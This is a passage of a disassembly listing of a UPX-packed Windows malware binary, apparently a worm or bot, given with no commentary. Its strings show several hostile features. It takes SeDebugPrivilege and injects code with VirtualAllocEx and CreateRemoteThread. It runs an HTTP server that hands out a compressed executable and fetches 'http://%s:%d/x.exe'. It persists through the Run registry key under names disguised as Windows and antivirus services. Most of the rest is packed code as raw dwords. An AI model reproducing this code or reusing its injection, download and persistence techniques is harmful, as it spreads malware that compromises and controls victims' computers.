sub_314319BC+5Co pop esp pop esp loc_31434CA2: ; CODE XREF: UPX0:31434C9Aj and eax, 70695C73h arpl [eax+eax], sp ; --------------------------------------------------------------------------- dw 0 dword_31434CAC dd 1CEC8166h dword_31434CB0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31431F23+62o align 4 aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31431F23+39o align 10h aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31431F23+2Ao align 4 aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31431F23+1Bo align 4 aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31431F23+8o ; sub_3143256D+13Ao align 4 aUterm192 db 'uterm19-2',0 ; DATA XREF: sub_31431FAB:loc_31432090o align 4 aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31431FAB+58o align 4 aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31431FAB:loc_31431FF2o align 4 aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31431FAB+34o align 4 aKernel32 db 'kernel32',0 ; DATA XREF: sub_31431FAB+18o align 4 dword_31434D64 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+106o db 0Dh,0Ah db 0Dh,0Ah,0 align 10h aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31432239+85o db 0Dh,0Ah,0 align 4 aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+71o db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0 align 4 aGet db 'GET',0 ; DATA XREF: sub_31432239+3Do aUterm20 db 'uterm20',0 ; DATA XREF: UPX0:3143250Co ; sub_3143256D+148o aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:314324F7o align 10h aUser32 db 'user32',0 ; DATA XREF: sub_3143256D+141o align 4 aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3143256D+133o align 10h aWininet db 'wininet',0 ; DATA XREF: sub_3143256D+12Co aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3143256D+11Fo align 10h aU20x db 'u20x',0 ; DATA XREF: sub_3143256D+CBo align 4 aU20 db 'u20',0 ; DATA XREF: sub_3143256D+C4o aU19 db 'u19',0 ; DATA XREF: sub_3143256D+BDo aU18 db 'u18',0 ; DATA XREF: sub_3143256D+B6o aU17 db 'u17',0 ; DATA XREF: sub_3143256D+AFo aU16 db 'u16',0 ; DATA XREF: sub_3143256D+A8o aU15 db 'u15',0 ; DATA XREF: sub_3143256D+A1o aU14 db 'u14',0 ; DATA XREF: sub_3143256D+9Ao aU13i db 'u13i',0 ; DATA XREF: sub_3143256D+93o align 4 aU13 db 'u13',0 ; DATA XREF: sub_3143256D+8Co aU12 db 'u12',0 ; DATA XREF: sub_3143256D+85o aU11 db 'u11',0 ; DATA XREF: sub_3143256D+7Eo aU10 db 'u10',0 ; DATA XREF: sub_3143256D+77o aU9 db 'u9',0 ; DATA XREF: sub_3143256D+70o align 10h aU8 db 'u8',0 ; DATA XREF: sub_3143256D+69o align 4 aU19x db 'u19x',0 ; DATA XREF: sub_3143256D+62o align 4 aU18x db 'u18x',0 ; DATA XREF: sub_3143256D+5Bo align 4 aU17x db 'u17x',0 ; DATA XREF: sub_3143256D+54o align 4 aU16x db 'u16x',0 ; DATA XREF: sub_3143256D+4Do align 4 aU15x db 'u15x',0 ; DATA XREF: sub_3143256D+46o align 4 aU14x db 'u14x',0 ; DATA XREF: sub_3143256D+3Fo align 4 aU13x db 'u13x',0 ; DATA XREF: sub_3143256D+38o align 4 aU12x db 'u12x',0 ; DATA XREF: sub_3143256D+31o align 4 aU11x db 'u11x',0 ; DATA XREF: sub_3143256D+2Ao align 4 aU10x db 'u10x',0 ; DATA XREF: sub_3143256D+23o align 4 aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_314328D7+2Do align 4 aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 ; DATA XREF: sub_3143237F+23o ; sub_31432BAD+66o ... align 4 aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_3143237F+1Co ; sub_31432C62+87o ... align 10h aBbdenbucqfywfv db 'bbdenbucqfywfvz',0 ; DATA XREF: sub_31431782+4Fo ; sub_31432D2E+57o ... dd 2 dup(0) aSoftwareMicr_1 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31432D2E+32o aClient db 'Client',0 ; DATA XREF: sub_31432D2E+BCo ; sub_31432D2E+F8o align 4 aId db 'ID',0 ; DATA XREF: sub_31432D2E+37o ; sub_31432D2E+75o align 10h aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31432BAD+55o align 10h aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31432BAD+4Eo align 10h aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31432BAD+47o align 4 aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31432BAD+40o aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31432BAD+39o align 10h aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31432BAD+32o align 4 aSystray db 'SysTray',0 ; DATA XREF: sub_31432BAD+2Bo aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31432BAD+24o align 10h aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31432BAD+1Do align 4 aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31432BAD+16o align 4 aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31432BAD+Fo align 4 a1: ; DATA XREF: sub_31432D2E+B7o unicode 0, <1>,0 dd 7 dup(0) dword_31435028 dd 0 ; sub_3143237F+80w dword_3143502C dd 0 ; sub_3143185D+53o ... dword_31435030 dd 0 ; sub_31432239:loc_314322E7r ... dword_31435034 dd 68h ; UPX0:31432517w ... dword_31435038 dd 0 ; sub_3143256D+DCw dword_3143503C dd 0 ; sub_314328D7+20r dword_31435040 dd 31430000h ; UPX0:314324FCw dword_31435044 dd 0 ; sub_3143185D+4Ao ... dword_31435048 dd 0 ; UPX0:31432974w ... dword_3143504C dd 0 ; sub_31432728+41r ... dword_31435050 dd 0 ; sub_31432D2E+110w align 1000h UPX0 ends ; Section 2. (virtual address 00006000) ; Virtual size : 00002000 ( 8192.) ; Section size in file : 00002000 ( 8192.) ; Offset to raw data for section: 00006000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 31436000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31436000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h ; DATA XREF: UPX1:31437C81o dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h dd 44010074h, 74656C65h, 6C694665h, 1004165h, 4C746547h dd 45747361h, 726F7272h, 72570100h, 46657469h, 656C69h dd 6F6C4301h, 61486573h, 656C646Eh, 72430100h, 65746165h dd 656C6946h, 6C010041h, 6C727473h, 416E65h, 74736C01h dd 74616372h, 47010041h, 79537465h, 6D657473h, 65726944h dd 726F7463h, 1004179h, 65746E49h, 636F6C72h, 4564656Bh dd 61686378h, 65676Eh, 74654701h, 61636F4Ch, 6E49656Ch dd 416F66h, 656C5301h, 1007065h, 7274736Ch, 6E797063h dd 47010041h, 75437465h, 6E657272h, 6F725074h, 73736563h dd 65470100h, 6F725074h, 64644163h, 73736572h, 6F4C0100h dd 694C6461h, 72617262h, 1004179h, 74697257h, 6F725065h dd 73736563h, 6F6D654Dh, 1007972h, 6E65704Fh, 636F7250h dd 737365h, 74654701h, 75646F4Dh, 6148656Ch, 656C646Eh dd 47010041h, 69547465h, 6F436B63h, 746E75h, 65724301h dd 4D657461h, 78657475h, 43010041h, 74616572h, 72685465h dd 646165h, 65724301h, 50657461h, 65636F72h, 417373h, 74655301h dd 6E657645h, 4F010074h, 456E6570h, 746E6576h, 45010041h dd 54746978h, 61657268h, 49010064h, 7265746Eh, 6B636F6Ch dd 6E496465h, 6D657263h, 746E65h, 61655201h, 6C694664h dd 47010065h, 69467465h, 6953656Ch, 100657Ah, 74697845h dd 636F7250h, 737365h, 0D100h, 0 dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h dd 337265h, 72747301h, 727473h, 6F746101h, 73010069h, 68637274h dd 0E9000072h, 14000000h, 1000001h, 646E6946h, 646E6957h dd 41776Fh, 74654701h, 65726F46h, 756F7267h, 6957646Eh dd 776F646Eh, 65470100h, 6E695774h, 54776F64h, 61657268h dd 6F725064h, 73736563h, 1006449h, 72707377h, 66746E69h dd 0F4000041h, 28000000h, 1000001h, 65746E49h, 74656E72h dd 6E65704Fh, 416C7255h, 6E490100h, 6E726574h, 704F7465h dd 416E65h, 746E4901h, 656E7265h, 6F6C4374h, 61486573h dd 656C646Eh, 6E490100h, 6E726574h, 65477465h, 6E6F4374h dd 7463656Eh, 74536465h, 657461h, 746E4901h, 656E7265h dd 61655274h, 6C694664h, 65h, 40000001h, 0FF000001h, 2FF0073h dd 0DFF00h, 0FF0001FFh, 6FFF0039h, 34FF00h, 0FF0017FFh dd 9FF000Ch, 4FF00h, 0FF0013FFh, 16FF0010h, 3FF00h, 0 dd 455000h, 2014C00h, 0E07ED200h, 40h, 0 dd 0F00E000h, 6010B01h, 280000h, 120000h, 0 dd 24EF00h, 100000h, 400000h, 43000000h, 100031h, 20000h dd 400h, 0 dd 400h, 0 dd 600000h, 40000h, 0 dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0 dd 1000h, 2 dup(0) dd 2F0400h, 8C00h, 14h dup(0) dd 100000h, 18000h, 6 dup(0) dd 65742E00h, 7478h, 263200h, 100000h, 280000h, 40000h dd 3 dup(0) dd 4002000h, 61642EE0h, 6174h, 105400h, 400000h, 120000h dd 2C0000h, 3 dup(0) dd 4000h, 5000C0h, 311000h, 54C900h, 57965900h, 6849FAFAh dd 0B7000E29h, 844F4CCFh, 0A2623FE0h, 0DC24106Ah, 0DED1BA53h dd 44810B66h, 5F0DC766h, 0B73BD68h, 0E4D6E6CDh, 0DE196664h dd 164C2621h, 0FC5644DEh, 31E07589h, 51B36968h, 3EA2E2Eh dd 0C8BF9C37h, 0E89C3A7h, 6CD8E087h, 770D7C13h, 0A8433716h dd 18D3B345h, 9B6BDB07h, 0F88C0D0Bh, 49190640h, 73F27046h dd 6A9821CDh, 4634332Eh, 17273C8h, 37E0DE64h, 3010CCDFh dd 8C0F4608h, 0D0BD8027h, 740B89E5h, 0C5803126h, 43089D01h dd 0D0EECD70h, 0BC3C0007h, 115690F0h, 0B66061EEh, 0AA425F0Ch dd 0C1FF15Ch, 11784396h, 0C9EC0CB3h, 9705C87Ch, 0F8786E0Ah dd 894BE6A1h, 25620546h, 0DA46568h, 0AEC28B6Dh, 92A2043Bh dd 3CF01Ch, 27BE83Bh, 100BC86Ah, 4824A32Eh, 86024A19h dd 0A0CF6043h, 2163390h, 0B9AEBB03h, 0A73D7D95h, 769F6801h dd 664A48E6h, 3A21B736h, 1B5AB7CCh, 3DB9A4E0h, 6A7684E4h dd 96F42A70h, 364719B4h, 5EC86007h, 7A97640Ah, 39F0D92Eh dd 0A2280084h, 3C4B283Fh, 0CDCB59B2h, 98B9B26Ch, 23BDEBE2h dd 0DC0167A7h, 0C77E500Fh, 0BE1F218Dh, 0AC68F60Eh, 0D328C00Dh dd 0C676E6C9h, 0E57A08A1h, 0DB0C7A04h, 0C8611488h, 2DC54C20h dd 6C84BF34h, 2EDB1CD6h, 0B698DE40h, 4192FC84h, 40BCDE44h dd 0C27190D6h, 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh dd 67E9ACF9h, 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h dd 1CF25B07h, 96F41276h, 0A19DE9C3h, 4F0CEF1Bh, 7BC87C6Ah dd 64B1E3C3h, 0C9BE4934h, 991DD27Bh, 90E154E4h, 0B42DE924h dd 48B9B999h, 0EDCF7881h, 0C80A5848h, 0CF88286h, 6633F415h dd 2665846h, 7808747Ah, 41BA9D5Fh, 5FF4C65Eh, 7D1C0F8Ah dd 9C1369E0h, 0AC204D0Ch, 0C0A8357Fh, 5F68683h, 572448F8h dd 565FC937h, 5A7457D8h, 74F80E14h, 0B8C8684Bh, 0CA8950BAh dd 0E83D7496h, 4B4B3F6Ch, 0A44120C9h, 0FFC55FFh, 0F6B9ADE8h dd 50E4B92Ch, 0E9628ACh, 0CCDA6AD9h, 0F81B02F0h, 0E48C0009h dd 81DB40ACh, 42F47558h, 29C587EEh, 8B181F13h, 6701400Dh dd 0BFEEFFB6h, 3C418B2Fh, 68C10357h, 488B9758h, 50788B34h dd 0A0F44D89h, 8D759CB8h, 1BDBD84Bh, 0BEF09153h, 0B002F0ACh dd 4751EB01h, 0ED74EC12h, 1AC55A0Ch, 0D7240Dh, 9300CA82h dd 18090E6Dh, 0B22ECDEh, 0F84DAFDFh, 1C185051h, 412A6897h dd 8958D8ABh, 60FE5DB4h, 0CAD2C68Bh, 1C346B03h, 0B7680630h dd 59AB1976h, 0BE7DF055h, 135BAB62h, 0F03E45E6h, 0DC50EF51h dd 34EC5F13h, 34A110B0h, 0FFFAD6BDh, 172783C4h, 5577D06Ah dd 74C73BECh, 805F8C78h, 1BEB1605h, 684D1868h, 3959E010h dd 0E5CC857h, 8D405FCh, 0F8041D74h, 0FC58EFA2h, 4251511Dh dd 2F0DC32Bh, 69310F60h, 41B60D10h, 0BC258964h, 22B1AFDDh dd 138575D6h, 590FECB2h, 5D33DB2Dh, 6AF9C267h, 803CC0B6h dd 624EE90Ch, 50A85089h, 0C42C507Dh, 0AC297488h, 8020195Dh dd 0B3F8B55Bh, 7C8B5743h, 57D21424h, 67FFF7Eh, 1A87178Bh dd 8861C280h, 3B461E14h, 80E97CF7h, 0E030E036h, 4A003B24h dd 86444954h, 2EDB78CEh, 57AC5A5Fh, 2166DB56h, 303A5DCh dd 0F0DC732Fh, 25B81950h, 648D62h, 0E377ACAAh, 954D04F0h dd 49F408C8h, 0DBA32668h, 0F00CFADAh, 3408C7FFh, 0DA65B27Bh dd 2E2ACC34h, 0A0A7550h, 666B5CE8h, 1A20BC54h, 0B7ED5818h dd 7C64F85h, 13B7FB8h, 0C408B14h, 2C01008Bh, 86F8E76h dd 24448D51h, 1134215Fh, 9A7C2D3h, 245903DBh, 0BBD01507h dd 7743A19Eh, 2FCC2007h, 3233E433h, 0F8C83FDBh, 8510E7C1h dd 0A05B60Bh, 200CD86h, 0CF125D8Bh, 1C0BABECh, 7FC20099h dd 7B55C653h, 139E2416h, 0C0934521h, 25AAECF0h, 6E5D868h dd 5B4ECF20h, 17B5ADE7h, 675641F0h, 35953336h, 0A33D986Ch dd 8CC6EC66h, 503044B7h, 0B370FE47h, 4D80C581h, 0EBDA14A5h dd 54B3174Eh, 0A134007Ch, 37FBAE33h, 7900B9F0h, 0C13BC72Bh dd 0C18B0272h, 0FC292BE1h, 0A1DDBDDDh, 0C7031828h, 1374AC23h dd 1172233Dh, 4678516Ah, 40F8784Bh, 0EC13C4EBh, 0E1B462D9h dd 0D8117750h, 0DC9A941Eh, 68159E4Dh, 68030B68h, 9B6B3A64h dd 3A3C97C5h, 8F535453h, 52CC7D18h, 9824D483h, 0C423347Dh dd 30DE04C2h, 4FB2F457h, 0B1B1087Dh, 0E868C3D0h, 168EE4Eh dd 0B8BAAFDEh, 89FF6806h, 0ED04841Dh, 0D4244BA9h, 539100F2h dd 9886937Bh, 3A01026Dh, 1CD680A6h, 0FD775A8Dh, 0E741A4Dh dd 2F6946CFh, 0CA3E0CDh, 0ACEF4BC2h, 0A4FEA365h, 565153FCh dd 635B3A5Bh, 68DC3A86h, 87DF2656h, 5EF9119Bh, 10C25C19h dd 1B4D424Ch, 56C05E05h, 9DFD0C4Bh, 89E8D2F4h, 50DEC5Dh dd 1FFF25FFh, 0BEEC1BFDh, 0A3C33A04h, 0E774433Ch, 84CC8A1Fh dd 50DF74C9h, 937ABE3h, 5F42EA6Bh, 4C85A544h, 646530B7h dd 0B97B480Ch, 5F7D35FBh, 1FD814F8h, 68B1114Ch, 0D9C22239h dd 9111D5Bh, 53E2EB62h, 0CC455FCFh, 4384B982h, 0B6700190h dd 0AE3AF759h, 0D6B03340h, 36023E11h, 0E687A60Fh, 0B8803AD6h dd 3044E468h, 0A3AB1B63h, 7C74E040h, 4AB27633h, 34A37B69h dd 767B781Ah, 0B73D6182h, 29E44552h, 43041F0Fh, 1BB37D9Ch dd 682A1DA9h, 0A713256Dh, 13ED7ED1h, 1586EB0Dh, 35699969h dd 0AC188438h, 397044C6h, 4B104D40h, 0D290E409h, 3372396Ch dd 88454ADCh, 8C06EF9Ch, 238C9094h, 941C8E47h, 9C7C9884h dd 0E472A074h, 0A46C91C8h, 0AC5CA864h, 1C8E4754h, 0B450B039h dd 0BC48B84Ch, 91C8E444h, 0C440C023h, 8E34C83Ch, 0CC72391Ch dd 0D42CD030h, 0C724D828h, 0DC472391h, 0E41CE020h, 76CD9018h dd 9C10C780h, 0A36CE145h, 7ADB72F1h, 2FCBEECh, 730A8384h dd 0B806ED12h, 4F8442B4h, 59B8885h, 9B0CFF59h, 0EBD9C870h dd 0B00E1AE8h, 0E0F91A6Ah, 95391A17h, 8683974h, 32ACB94Eh dd 45936C72h, 0F8064E00h, 21760C4Dh, 0A8F07261h, 49BF140Ah dd 79B7676Eh, 0EF15237Fh, 0F1185D0Ah, 33C822E0h, 559C5029h dd 0D747E90Fh, 18B4146Dh, 0AA138806h, 1412E3EBh, 17A7049Eh dd 0DBA3BD23h, 63123818h, 7FA48071h, 8FD5BDh, 458A4FBBh dd 0FF77530Bh, 83DBDB32h, 3A518701h, 5D3831D9h, 0E93125DBh dd 5D88E291h, 0B8099D0Bh, 80CF1559h, 4CB72CDFh, 0F1F7D233h dd 0FE9BD103h, 0CB65EBC3h, 0FFFB80F8h, 60C6BD72h, 1C0F5674h dd 7A303876h, 41586667h, 4F870ADBh, 40A7F05h, 3B6B3618h dd 9A0B0918h, 17692573h, 0F758BECh, 37272804h, 0AC01D0C8h dd 8147822Bh, 6CE27695h, 4C9FA16Ah, 7A595D5Eh, 2CD74CAEh dd 0F0A26472h, 7832DB7Ch, 0FD720A2Eh, 35F8FF04h, 0FEF42Fh dd 0F7887F3Ch, 0B18BB06Ah, 4D8B6C3h, 0A9DCFD3Bh, 0EC04A23Eh dd 579F6764h, 9B572F9Dh, 4B3DB21Ch, 1359F8E0h, 4A36FF8Ah dd 0B2C54ADCh, 68FCEE75h, 0C8EC3C27h, 0BDD3A21Ah, 70849ED3h dd 1C180961h, 4C5AA537h, 52AD630h, 508FCC4Fh, 18B6BD78h dd 0FC68BAE3h, 67B7C156h, 0B3C443Eh, 0A468B003h, 0DCB71E4Eh dd 11104580h, 6842E231h, 12F7D70h, 0B80C613h, 0C0B343DFh dd 5579BB02h, 8E579756h, 663C344h, 4D1DE6BCh, 30E26CA4h dd 0FD1F0C43h, 53146CF4h, 483776CDh, 20BF66Bh, 4838506Ah dd 76D9A65Dh, 0D005C7DFh, 1974F896h, 9D01480Bh, 0BDDCCE60h dd 141A055Eh dd 0E103D851h, 1806DE27h, 0C9FB81D3h, 0D6530D74h, 0B6844203h dd 1D1053C7h, 0DB04C3Bh, 1824C37Dh, 0ED85ED3Ch, 10B1117Eh dd 0EED82C28h, 144DEDB0h, 0A40598EFh, 200DF2EBh, 75324B74h dd 6DDEB65h, 0EB45C0B0h, 27D53F68h, 60B11BA2h, 0B5150C64h dd 43A5106Fh, 14083BE8h, 6CD7513Bh, 18D4C859h, 18430856h dd 31883EF6h, 3D566C2Eh, 0A52ADC74h, 4DE702DBh, 2050DF61h dd 4E05B110h, 3081896h, 6B0F5EB6h, 557E2CD1h, 0FAEDC68Bh dd 6764C82Eh, 532C56ADh, 67005556h, 270C422Dh, 0C520A31h dd 2C81C931h, 0C45D0C04h, 0BB679061h, 0E0530128h, 0F40B89FBh dd 8E3D4E2Dh, 1E3C4094h, 1F10365Ch, 794E7A1Ch, 0F8E510F7h dd 0EB778B64h, 687AA239h, 17D86635h, 0B13B3Bh, 2005C710h dd 0A24F7789h, 7DF21E99h, 1E748D47h, 0BD02609Bh, 0AE48FCA2h dd 0FE8194DCh, 0B5FF1C2Ah, 0FFF51EFh, 0E6CCCD1Fh, 60085282h dd 0D5CCE50h, 76EC4687h, 3CB787BDh, 89D0D036h, 0B457E273h dd 23914FECh, 6D846C7h, 0B4D8C0D4h, 0C8E47239h, 0A0E0ACDCh dd 7CE888E4h, 1C8E4730h, 50F060ECh, 45F340F4h, 86B764D3h dd 0BE70BF0Bh, 8B858E85h, 188B8A05h, 0A0406C49h, 8357C491h dd 0F4D50E17h, 1D101B05h, 8340F10Bh, 326A8452h, 0A775BFAFh dd 4D84628Ah, 74767830h, 5D74B409h, 653FA8CCh, 0A5636A88h dd 0FE0B84C8h, 28A19C09h, 8303E083h, 866305C0h, 5BD3CAA3h dd 51CFC42Ah, 10B9186Eh, 661C3D1Eh, 0D6CE9DEEh, 3F140E26h dd 3D9A0497h, 0D56150E8h, 1425A00Bh, 0CD4B4D21h, 0D2415662h dd 7D09E592h, 19419836h, 0C401F454h, 2E987A04h, 0AB8BE407h dd 0B408B9F6h, 481FC523h, 436839C7h, 2565140Ch, 84102550h dd 0E04DBFDDh, 0BF501D6Ah, 3C4C4F18h, 0C1D0514Fh, 743F81EAh dd 0BB0A3D37h, 32BD758Ah, 53D942B3h, 60D8B3F4h, 53BC4906h dd 0BDB3383Dh, 0EBB17EE6h, 32CE590Fh, 65B068B6h, 0E227A0C1h dd 0D12A0E65h, 58C22638h, 0D9B9DA18h, 0BB4634B2h, 5E1C0DB9h dd 0EB05066h, 57125E1Eh, 964EC6F0h, 0C6314CEEh, 0B6413BBBh dd 2CFD90CCh, 90B650B6h, 480718B7h, 6015EB0Ch, 2D1880E5h dd 0AF2509CDh, 5D32BA1Eh, 44330C69h, 0EC5B3D5Ch, 6A7E6883h dd 0CC401113h, 84D0A99Bh, 311BFF00h, 661DF805h, 0F4109E46h dd 0BE511FF0h, 0B048D56Fh, 1472048Dh, 2D0BE981h, 0FD8FEDF5h dd 17018504h, 0C82BEC73h, 8B0CC48Bh, 0D8088BE1h, 0FF6ED6C8h dd 435C5004h, 4055C64h, 58D8D800h, 0A3000049h, 420900A8h dd 6C5D2FCh, 5224F102h, 80314153h, 0FFFFFFC8h, 0F50101DDh dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh dd 5E1A9544h, 0FFFFFFE8h, 85A03261h, 949F6A1Fh, 843994FFh dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 377FFFFFh dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h dd 3B656C62h, 49534D20h, 0ED6FFFF7h, 15362045h, 6E695709h dd 73776F64h, 20544E20h, 29312E35h, 2EECF734h, 0C7E445h dd 0C40104D4h, 0F7DF0EB4h, 90A0CF3Ch, 68047480h, 0CF3D580Eh dd 48097CF3h, 30D4743Ch, 9364DF3Ch, 10222045h, 0B600304Ah dd 0F8F90DFFh, 76631340h, 75722E76h, 0D8DB777Eh, 700D6F6h dd 976C6465h, 0C1660F65h, 0EDFFCA65h, 616573FDh, 0E686372h dd 626F721Fh, 6863786Fh, 6F676E61h, 0D2E6EDFFh, 0C74651Fh dd 622E6472h, 61007A69h, 6B686328h, 91B61762h, 740C6D61h dd 24782D06h, 0E6EDB6CDh, 6F6C0600h, 6B37620Eh, 0FBDBF647h dd 27626B6h, 76742E7Ah, 6F74111Bh, 176E2E70h, 30B60215h dd 27730F69h, 3FC2E33h, 0F788DB6h, 6C756461h, 4B652D74h dd 6DDB7269h, 3380CDFBh, 73A66E6Fh, 622E744Eh, 2B01F767h dd 67694F7Ch, 77780032h, 0FECE2C61h, 626AED6Dh, 9B00AD62h dd 6166617Ah, 221F2EA8h, 655DDBE1h, 61AF5C23h, 0F1646362h dd 65FFDBB7h, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h dd 0FF7A7978h, 54BFFFF2h, 44434241h, 48474645h, 4C4B4A49h dd 504F4E4Dh, 56555451h, 5A595857h, 1B9BFBF8h, 49642563h dd 6F530044h, 5C9E7466h, 706C694Dh, 0F90656BBh, 0DA575C0Dh dd 0FE007374h, 4774E30Fh, 74684F31h, 2F3A7074h, 0C273252Fh dd 0BC0EE6Fh, 2EC3912Fh, 3F706870h, 0EDF9ED3Ah, 260F3DDBh dd 66E6373h, 6E692664h, 0F3B7666h, 3DF6EC76h, 13263032h dd 0EB373D74h, 32313958h, 0BF87B237h, 3101D06Bh, 3030383Ah dd 0DF07652Fh, 80FFFF00h, 5DDF1030h, 0B966C933h, 758D01EEh dd 8AFE8B05h, 6FFFE206h, 7993CDBh, 302C0646h, 88993446h dd 0EDE24707h, 0DAE80AEBh, 0B46FF7FEh, 676507DFh, 9993712Eh dd 0FD1201C9h, 16FD91BDh, 0DFFFEFF7h, 6872C107h, 66FD42AAh dd 0BA10FDAAh, 98A91C14h, 98F3C91Ah, 0FFB308F1h, 2865BB1h dd 9010C071h, 9237CB5Fh, 781C9659h, 0F93ED3Ah, 57E414FBh dd 3A0A7D71h, 9DF34571h, 9D2304F1h, 989BEFBh, 119C04F1h dd 0EF67B340h, 0F3FD8EEDh, 1C10F0E3h, 59B20BDCh, 25C99B60h dd 3D8F9601h, 414D9F6h, 71CA17A1h, 688D2B9Eh, 0EDAD9161h dd 1A4637B3h, 111D960Ah, 0C850B228h, 6D9FED00h, 0DC14996Fh dd 12255557h, 91C0A44Eh, 0FD994912h, 0EDDEDFECh, 140054F7h dd 0CBCA3AC4h, 0FF1C3B71h, 6C21E424h, 1ADD87B3h, 8FCDCDCFh dd 3F812C66h, 0FBB66F1Eh, 0B8B0FB9Fh, 12CDC383h, 0CBC9A85Dh dd 7F64251Dh, 24AD9DB2h, 0A6485A0Bh, 0B314C096h, 1BC9FECBh dd 0EBA7294Ch, 0E9BA9CF3h, 0D9FFF716h, 26F434F7h, 0EFCF571h dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 766FFFEFh, 16A0A8ECh dd 0FFC5B701h, 0E9ECE9EDh, 0E1FCB7FDh, 0FBBFD2Ch, 0F5CA0161h dd 0F25AFCFCh, 0FCF7EBFCh, 0FFABAAF5h, 0D6BFFFE5h, 0AAF934C7h dd 2A25B459h, 0ACC9662Ah, 0B7819093h, 83639D90h, 9271CDC9h dd 67F0BEECh, 3519BF30h, 95D91451h, 2A91720Ah, 0FFFBC871h dd 0D2EB20FFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah dd 474A9A8Bh, 46FEDFFFh, 9BAB9EEBh, 20A319DBh, 0DDA26CECh dd 9EED85BDh, 81E8A2DFh, 0FDBFFFCDh, 125544EBh, 961FBDC8h dd 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 0BBF8105Ah, 960B09FFh dd 664922D0h, 12FEFD7Fh, 0C25AA987h, 6EDB4095h, 1285026Fh dd 5A910482h, 9CFF7CBh, 0A767F9B9h, 4D53FF85h, 53187242h dd 0F4BFFFC8h, 62FEFFCFh, 43500200h, 575445ABh, 204B524Fh dd 474F5250h, 0ED624152h, 204DE35Bh, 4C17CD31h, 24D4E41h dd 0EB52B70Ah, 3D66D390h, 676B03DFh, 4BB696EBh, 0E707587h dd 27611A33h, 1F2A234Dh, 583274B6h, 32323221h, 5833312Eh dd 18FE66D3h, 8B323C20h, 0C95A25A4h, 7A0773C8h, 0DBEC1B1Ah dd 23FF0Ch, 140A1104h, 0DD40520h, 185DADEh, 4B4C0069h dd 68505353h, 4BE48F6h, 8829772h, 240057E0h, 0EB605DCDh dd 6F30006Eh, 3A73009Dh, 